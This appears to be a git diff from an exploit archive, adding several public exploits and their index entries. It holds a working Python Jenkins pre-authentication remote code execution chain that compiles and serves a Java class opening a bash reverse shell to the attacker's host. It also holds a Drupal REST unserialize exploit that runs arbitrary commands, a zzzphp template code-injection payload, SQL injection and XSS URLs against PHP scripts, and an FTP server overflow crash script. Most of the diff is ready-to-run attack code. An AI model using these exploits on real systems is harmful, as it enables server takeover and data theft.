diff --git a/exploits/java/webapps/46453.py b/exploits/java/webapps/46453.py new file mode 100755 index 000000000..661500c97 --- /dev/null +++ b/exploits/java/webapps/46453.py @@ -0,0 +1,153 @@ +#!/usr/bin/env python +# +# Exploit Title : jenkins-preauth-rce-exploit.py +# Date : 02/23/2019 +# Authors : wetw0rk & 0xtavian +# Vendor Homepage : https://jenkins.oi +# Software Link : https://jenkins.io/download/ +# Tested on : jenkins=v2.73 Plugins: Script Security=v1.49, Pipeline: Declarative=v1.3.4, Pipeline: Groovy=v2.60, +# +# Greetz: Hima, Fr13ndzSec, AbeSnowman, Berserk, Neil +# +# Description : This exploit chains CVE-2019-1003000 and CVE-2018-1999002 for Pre-Auth Remote Code Execution in Jenkins +# Security Advisory : https://jenkins.io/security/advisory/2019-01-08/#SECURITY-1266 +# +# Vulnerable Plugins - +# Pipeline: Declarative Plugin up to and including 1.3.4 +# Pipeline: Groovy Plugin up to and including 2.61 +# Script Security Plugin up to and including 1.49 +# +# +# Credit Goes To @orange_8361 & adamyordan +# +# http://blog.orange.tw/2019/01/hacking-jenkins-part-1-play-with-dynamic-routing.html +# http://blog.orange.tw/2019/02/abusing-meta-programming-for-unauthenticated-rce.html +# https://github.com/adamyordan/cve-2019-1003000-jenkins-rce-poc + +import os +import sys +import requests +import random +import SimpleHTTPServer +import SocketServer +import multiprocessing + +class exploit_ya_bish(): + + def __init__(self, rhost, rport, lhost, lport): + self.rhost = rhost + self.rport = rport + self.lhost = lhost + self.lport = lport + self.pname = "" + + # evil_server: server to host the payload + def evil_server(self): + handler = SimpleHTTPServer.SimpleHTTPRequestHandler + httpd = SocketServer.TCPServer((self.lhost, 80), handler) + httpd.serve_forever() + return + + # gen_payload: generate payload and start web server + def gen_payload(self): + self.pname = ''.join( + [ + random.choice( + "ABCDEFGHIJKLMNOPQRSTUVWXYZ" + "abcdefghijklmnopqrstuvwxyz" + ) for i in range(random.randint(1, 25)) + ] + ) + + home = os.getcwd() + os.makedirs("www/package/%s/1/" % self.pname) + os.chdir("www/package/%s/1/" % self.pname) + + pfile = 'public class %s {\n' % self.pname + pfile += ' public %s() {\n' % self.pname + pfile += ' try {\n' + pfile += ' String payload = "bash -i >& /dev/tcp/{:s}/{:s} 0>&1";\n'.format(self.lhost, self.lport) + pfile += ' String[] cmds = { "/bin/bash", "-c", payload };\n' + pfile += ' java.lang.Runtime.getRuntime().exec(cmds);\n' + pfile += ' } catch (Exception e) {\n' + pfile += ' }\n' + pfile += ' }\n' + pfile += '}\n' + + print "{1} generating payload" + fd = open('{:s}.java'.format(self.pname), 'w') + fd.write(pfile) + fd.close() + + os.makedirs("META-INF/services/") + os.system("echo %s > META-INF/services/org.codehaus.groovy.plugins.Runners" % self.pname) + os.system("javac -Xlint:-options -source 6 -target 1.6 %s.java" % self.pname) + os.system("jar cf %s-1.jar ." % self.pname) + + print "{2} starting evil payload server" + os.chdir("%s/www" % home) + jobs = [] + for i in range(1): + p = multiprocessing.Process(target=self.evil_server) + jobs.append(p) + p.start() + + os.chdir(home) + + return + + def exploit(self): + self.gen_payload() + + cookies = \ + { + 'JSESSIONID.wetw0rk!': 'XXXXXXXXXXXXXXXXXXXXXXXX', + } + + headers = \ + { + 'Host': '{:s}:{:s}'.format(self.rhost, self.rport), + 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', + 'Accept-Language': 'en-US,en;q=0.5', + 'Accept-Encoding': 'gzip, deflate', + 'Connection': 'close', + 'Upgrade-Insecure-Requests': '1', + } + + print "{3} as easy as 1,2,3 triggering now" + response = requests.get( + ( + 'http://{:s}:{:s}/securityRealm/user/admin/descriptorByName/' + 'org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=' + '@GrabConfig(disableChecksums=true)%0a' + '@GrabResolver(name=%27{:s}%27,%20root=%27http://{:s}%27)%0a' + '@Grab(group=%27package%27,%20module=%27{:s}%27,%20version=%271%27)%0aimport%20Payload;'.format( + self.rhost, self.rport, + self.pname, + self.lhost, + self.pname + ) + ), + headers=headers, + cookies=cookies, + verify=False + ) + + return + +def main(): + try: + rhost = sys.argv[1] + rport = sys.argv[2] + lhost = sys.argv[3] + lport = sys.argv[4] + except: + print "Usage: ./%s " % sys.argv[0] + print "MAKE SURE U GOT A LISTENER HOMIE!!" + exit(-1) + + start = exploit_ya_bish(rhost,rport,lhost,lport) + start.exploit() + os.system("rm -r www") + +main() \ No newline at end of file diff --git a/exploits/php/webapps/46454.txt b/exploits/php/webapps/46454.txt new file mode 100644 index 000000000..16936e69f --- /dev/null +++ b/exploits/php/webapps/46454.txt @@ -0,0 +1,30 @@ +# Exploit Title: dynamic code evaluation of zzzphp cms 1.6.1 + +# Google Dork: intext:"2015-2019 zzcms.com" + +# Date: 24/02/2019 + +# Exploit Author: Yang Chenglong + +# Vendor Homepage: http://www.zzzcms.com/index.html + +# Software Link: http://115.29.55.18/zzzphp.zip + +# Version: 1.6.1 + +# Tested on: windows/Linux,iis/apache + +# CVE : CVE-2019-9041 + +Due to the failure of filtering function parserIfLabel() in inc/zzz_template.php, attackers can insert dynamic php code into the template file and leads to dynamic code evaluation. + +Exploit: +login in to the admin panel, edit the template of search.html, insert the following code: + +{if:assert($_POST[x])}phpinfo();{end if} + +Visit the http://webroot/search/ and post data “x = phpinfo();”, the page will execute the php code “phpinfo()” as follow: +[1.png] + +Remarks: +While the above exploit requires attackers to have the access to the admin panel, I will post another exploit by using csrf to acquire the control of website without access to the admin panel. \ No newline at end of file diff --git a/exploits/php/webapps/46455.txt b/exploits/php/webapps/46455.txt new file mode 100644 index 000000000..2f36170da --- /dev/null +++ b/exploits/php/webapps/46455.txt @@ -0,0 +1,21 @@ +# Exploit Title: PHP Ecommerce Script 2.0.6 - Cross Site Scripting / SQL Injection +# Exploit Author: Mr Winst0n +# Author E-mail: manamtabeshekan[@]gmail[.]com +# Discovery Date: February 22, 2019 +# Vendor Homepage: http://www.phpscriptsmall.com/ +# Software Link : https://www.phpscriptsmall.com/product/php-ecommerce-script/ +# Tested Version: 2.0.6 +# Tested on: Kali linux, Windows 8.1 + + +# PoC: + +# Cross Site Scripting: + +# http://localhost/[PATH]/?s=[XSS] +# http://localhost/[PATH]/?s= + +# SQL Injection: + +# http://localhost/[PATH]/?s=[SQL] +# http://localhost/[PATH]/?s=1%20and%20extractvalue(rand(),concat(0x7e,version())) \ No newline at end of file diff --git a/exploits/php/webapps/46456.txt b/exploits/php/webapps/46456.txt new file mode 100644 index 000000000..d8064a1df --- /dev/null +++ b/exploits/php/webapps/46456.txt @@ -0,0 +1,15 @@ +# Exploit Title: News Website Script 2.0.5 - SQL Injection +# Exploit Author: Mr Winst0n +# Author E-mail: manamtabeshekan[@]gmail[.]com +# Discovery Date: February 22, 2019 +# Vendor Homepage: http://www.phpscriptsmall.com/ +# Software Link : https://www.phpscriptsmall.com/product/news-website-script/ +# Tested Version: 2.0.5 +# Tested on: Kali linux, Windows 8.1 + + +# PoC: + +# http://localhost/[PATH]/index.php/show/news/11 [SQL]/ + +# http://localhost/[PATH]/index.php/show/news/11%20and%201=0/Sports/january-25-2018/Pogba-still-has-to-improve-Allegri \ No newline at end of file diff --git a/exploits/php/webapps/46457.txt b/exploits/php/webapps/46457.txt new file mode 100644 index 000000000..e1de802f7 --- /dev/null +++ b/exploits/php/webapps/46457.txt @@ -0,0 +1,14 @@ +# Exploit Title: Advance Gift Shop Pro Script 2.0.3 - SQL Injection +# Exploit Author: Mr Winst0n +# Author E-mail: manamtabeshekan[@]gmail[.]com +# Discovery Date: February 21, 2019 +# Vendor Homepage: http://www.phpscriptsmall.com/ +# Software Link : https://www.phpscriptsmall.com/product/gifts-shop/ +# Tested Version: 2.0.3 +# Tested on: Kali linux, Windows 8.1 + + +# PoC: + +# http://localhost/[PATH]/?category=&s=[SQL]&search_posttype=product +# http://localhost/[PATH]/?category=&s=1%20and%20extractvalue(rand(),concat(0x7e,version()))&search_posttype=product \ No newline at end of file diff --git a/exploits/php/webapps/46459.py b/exploits/php/webapps/46459.py new file mode 100755 index 000000000..c36805c81 --- /dev/null +++ b/exploits/php/webapps/46459.py @@ -0,0 +1,224 @@ +#!/usr/bin/env python3 + +# CVE-2019-6340 Drupal <= 8.6.9 REST services RCE PoC +# 2019 @leonjza + +# Technical details for this exploit is available at: +# https://www.drupal.org/sa-core-2019-003 +# https://www.ambionics.io/blog/drupal8-rce +# https://twitter.com/jcran/status/1099206271901798400 + +# Sample usage: +# +# $ python cve-2019-6340.py http://127.0.0.1/ "ps auxf" +# CVE-2019-6340 Drupal 8 REST Services Unauthenticated RCE PoC +# by @leonjza +# +# References: +# https://www.drupal.org/sa-core-2019-003 +# https://www.ambionics.io/blog/drupal8-rce +# +# [warning] Caching heavily affects reliability of this exploit. +# Nodes are used as they are discovered, but once they are done, +# you will have to wait for cache expiry. +# +# Targeting http://127.0.0.1/... +# [+] Finding a usable node id... +# [x] Node enum found a cached article at: 2, skipping +# [x] Node enum found a cached article at: 3, skipping +# [+] Using node_id 4 +# [+] Target appears to be vulnerable! +# +# USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND +# root 49 0.0 0.0 4288 716 pts/0 Ss+ 16:38 0:00 sh +# root 1 0.0 1.4 390040 30540 ? Ss 15:20 0:00 apache2 -DFOREGROUND +# www-data 24 0.1 2.8 395652 57912 ? S 15:20 0:08 apache2 -DFOREGROUND +# www-data 27 0.1 2.9 396152 61108 ? S 15:20 0:08 apache2 -DFOREGROUND +# www-data 31 0.0 3.4 406304 70408 ? S 15:22 0:04 apache2 -DFOREGROUND +# www-data 39 0.0 2.7 398472 56852 ? S 16:14 0:02 apache2 -DFOREGROUND +# www-data 44 0.2 3.2 402208 66080 ? S 16:37 0:05 apache2 -DFOREGROUND +# www-data 56 0.0 2.6 397988 55060 ? S 16:38 0:01 apache2 -DFOREGROUND +# www-data 65 0.0 2.3 394252 48460 ? S 16:40 0:01 apache2 -DFOREGROUND +# www-data 78 0.0 2.5 400996 51320 ? S 16:47 0:01 apache2 -DFOREGROUND +# www-data 117 0.0 0.0 4288 712 ? S 17:20 0:00 \_ sh -c echo + +import sys +from urllib.parse import urlparse, urljoin + +import requests + + +def build_url(*args) -> str: + """ + Builds a URL + """ + + f = '' + for x in args: + f = urljoin(f, x) + + return f + + +def uri_valid(x: str) -> bool: + """ + https://stackoverflow.com/a/38020041 + """ + + result = urlparse(x) + return all([result.scheme, result.netloc, result.path]) + + +def check_drupal_cache(r: requests.Response) -> bool: + """ + Check if a response had the cache header. + """ + + if 'X-Drupal-Cache' in r.headers and r.headers['X-Drupal-Cache'] == 'HIT': + return True + + return False + + +def find_article(base: str, f: int = 1, l: int = 100): + """ + Find a target article that does not 404 and is not cached + """ + + while f < l: + u = build_url(base, '/node/', str(f)) + r = requests.get(u) + + if check_drupal_cache(r): + print(f'[x] Node enum found a cached article at: {f}, skipping') + f += 1 + continue + + # found an article? + if r.status_code == 200: + return f + f += 1 + + +def check(base: str, node_id: int) -> bool: + """ + Check if the target is vulnerable. + """ + + payload = { + "_links": { + "type": { + "href": f"{urljoin(base, '/rest/type/node/INVALID_VALUE')}" + } + }, + "type": { + "target_id": "article" + }, + "title": { + "value": "My Article" + }, + "body": { + "value": "" + } + } + + u = build_url(base, '/node/', str(node_id)) + r = requests.get(f'{u}?_format=hal_json', json=payload, headers={"Content-Type": "application/hal+json"}) + + if check_drupal_cache(r): + print(f'Checking if node {node_id} is vuln returned cache HIT, ignoring') + return False + + if 'INVALID_VALUE does not correspond to an entity on this site' in r.text: + return True + + return False + + +def exploit(base: str, node_id: int, cmd: str): + """ + Exploit using the Guzzle Gadgets + """ + + # pad a easy search replace output: + cmd = 'echo ---- & ' + cmd + payload = { + "link": [ + { + "value": "link", + "options": "O:24:\"GuzzleHttp\\Psr7\\FnStream\":2:{s:33:\"\u0000" + "GuzzleHttp\\Psr7\\FnStream\u0000methods\";a:1:{s:5:\"" + "close\";a:2:{i:0;O:23:\"GuzzleHttp\\HandlerStack\":3:" + "{s:32:\"\u0000GuzzleHttp\\HandlerStack\u0000handler\";" + "s:|size|:\"|command|\";s:30:\"\u0000GuzzleHttp\\HandlerStack\u0000" + "stack\";a:1:{i:0;a:1:{i:0;s:6:\"system\";}}s:31:\"\u0000" + "GuzzleHttp\\HandlerStack\u0000cached\";b:0;}i:1;s:7:\"" + "resolve\";}}s:9:\"_fn_close\";a:2:{i:0;r:4;i:1;s:7:\"resolve\";}}" + "".replace('|size|', str(len(cmd))).replace('|command|', cmd) + } + ], + "_links": { + "type": { + "href": f"{urljoin(base, '/rest/type/shortcut/default')}" + } + } + } + + u = build_url(base, '/node/', str(node_id)) + r = requests.get(f'{u}?_format=hal_json', json=payload, headers={"Content-Type": "application/hal+json"}) + + if check_drupal_cache(r): + print(f'Exploiting {node_id} returned cache HIT, may have failed') + + if '----' not in r.text: + print('[warn] Command execution _may_ have failed') + + print(r.text.split('----')[1]) + + +def main(base: str, cmd: str): + """ + Execute an OS command! + """ + + print('[+] Finding a usable node id...') + article = find_article(base) + if not article: + print('[!] Unable to find a node ID to reference. Check manually?') + return + + print(f'[+] Using node_id {article}') + + vuln = check(base, article) + if not vuln: + print('[!] Target does not appear to be vulnerable.') + print('[!] It may also simply be a caching issue, so maybe just try again later.') + return + print(f'[+] Target appears to be vulnerable!') + + exploit(base, article, cmd) + + +if __name__ == '__main__': + + print('CVE-2019-6340 Drupal 8 REST Services Unauthenticated RCE PoC') + print(' by @leonjza\n') + print('References:\n' + ' https://www.drupal.org/sa-core-2019-003\n' + ' https://www.ambionics.io/blog/drupal8-rce\n') + print('[warning] Caching heavily affects reliability of this exploit.\n' + 'Nodes are used as they are discovered, but once they are done,\n' + 'you will have to wait for cache expiry.\n') + + if len(sys.argv) <= 2: + print(f'Usage: {sys.argv[0]} ') + print(f' Example: {sys.argv[0]} http://127.0.0.1/ id') + + target = sys.argv[1] + command = sys.argv[2] + if not uri_valid(target): + print(f'Target {target} is not a valid URL') + sys.exit(1) + + print(f'Targeting {target}...') + main(target, command) \ No newline at end of file diff --git a/exploits/windows/dos/46458.py b/exploits/windows/dos/46458.py new file mode 100755 index 000000000..74a2232e0 --- /dev/null +++ b/exploits/windows/dos/46458.py @@ -0,0 +1,33 @@ +# Exploit Title: Xlight 3.9.1 FTP Server SEH Overwrite +# Google Dork: N/A +# Date: 2019-02-24 +# Exploit Author: Logan Whitmire +# Vendor Homepage: https://www.xlightftpd.com/index.htm +# Software Link: https://www.xlightftpd.com/download/xlight.zip +# Version: 3.9.1 +# Tested on: Windows XP +# CVE : N/A + + +POC:#!/usr/bin/python +#Vulnerable Software: Xlight FTP Server 3.9.1 +#Link: https://www.xlightftpd.com/download.htm +#Date: 2019-02-24 +#Twitter: thermal_tp +#inspired by bzyo's exploit +# 1. Generate overflow.txt, open, and copy contents to clipboard +# 2. Virtual Server +# 3. Modify Virtual Server Configuration +# 4. Advanced +# 5. Misc +# 6. Execute a program after user logged in +# 7. Setup +# 8. Paste crash.txt contents +# 9. Application crashes +# 10. SEH is overwritten + +buffer="A"*428 +file="overflow.txt" +generate=open(file, "w") +generate.write(buffer) +generate.close \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index e9793d7f2..04a0230db 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -6335,6 +6335,7 @@ id,file,description,date,author,type,platform,port 46443,exploits/android/dos/46443.py,"ScreenStream 3.0.15 - Denial of Service",2019-02-21,s4vitar,dos,android, 46445,exploits/android/dos/46445.c,"AirDrop 2.0 - Denial of Service (DoS)",2019-02-21,s4vitar,dos,android, 46448,exploits/multiple/dos/46448.js,"WebKit JSC - reifyStaticProperty Needs to set the PropertyAttribute::CustomAccessor flag for CustomGetterSetter",2019-02-22,"Google Security Research",dos,multiple, +46458,exploits/windows/dos/46458.py,"Xlight FTP Server 3.9.1 - Buffer Overflow (PoC)",2019-02-25,"Logan Whitmire",dos,windows, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux, @@ -40900,9 +40901,15 @@ id,file,description,date,author,type,platform,port 46424,exploits/php/webapps/46424.html,"XAMPP 5.6.8 - SQL Injection / Persistent Cross-Site Scripting",2019-02-19,"Rafael Pedrero",webapps,php,80 46425,exploits/jsp/webapps/46425.html,"Zoho ManageEngine Netflow Analyzer Professional 7.0.0.2 - Path Traversal / Cross-Site Scripting",2019-02-19,"Rafael Pedrero",webapps,jsp, 46426,exploits/php/webapps/46426.txt,"Ask Expert Script 3.0.5 - Cross Site Scripting / SQL Injection",2019-02-19,"Mr Winst0n",webapps,php,80 -46427,exploits/java/webapps/46427.txt,"Jenkins - Remote Code Execution",2019-02-19,orange,webapps,java, +46427,exploits/java/webapps/46427.txt,"Jenkins Plugin Script Security < 1.50/Declarative < 1.3.4.1/Groovy < 2.61.1 - Remote Code Execution (PoC)",2019-02-19,orange,webapps,java, 46429,exploits/php/webapps/46429.txt,"HotelDruid 2.3 - Cross-Site Scripting",2019-02-20,"Mehmet EMIROGLU",webapps,php,80 46446,exploits/multiple/webapps/46446.txt,"Quest NetVault Backup Server < 11.4.5 - Process Manager Service SQL Injection / Remote Code Execution",2019-02-22,"Chris Anastasio",webapps,multiple, 46450,exploits/linux/webapps/46450.txt,"Micro Focus Filr 3.4.0.217 - Path Traversal / Local Privilege Escalation",2019-02-22,SecureAuth,webapps,linux, 46451,exploits/hardware/webapps/46451.txt,"Teracue ENC-400 - Command Injection / Missing Authentication",2019-02-22,"Stephen Shkardoon",webapps,hardware, 46452,exploits/php/webapps/46452.txt,"Drupal < 8.6.10 / < 8.5.11 - REST Module Remote Code Execution",2019-02-23,"Charles Fol",webapps,php,80 +46453,exploits/java/webapps/46453.py,"Jenkins Plugin Script Security 1.49/Declarative 1.3.4/Groovy 2.60 - Remote Code Execution",2019-02-25,wetw0rk,webapps,java, +46454,exploits/php/webapps/46454.txt,"zzzphp CMS 1.6.1 - Remote Code Execution",2019-02-25,"Yang Chenglong",webapps,php, +46455,exploits/php/webapps/46455.txt,"PHP Ecommerce Script 2.0.6 - Cross-Site Scripting / SQL Injection",2019-02-25,"Mr Winst0n",webapps,php, +46456,exploits/php/webapps/46456.txt,"News Website Script 2.0.5 - SQL Injection",2019-02-25,"Mr Winst0n",webapps,php, +46457,exploits/php/webapps/46457.txt,"Advance Gift Shop Pro Script 2.0.3 - SQL Injection",2019-02-25,"Mr Winst0n",webapps,php, +46459,exploits/php/webapps/46459.py,"Drupal < 8.6.9 - REST Module Remote Code Execution",2019-02-25,leonjza,webapps,php,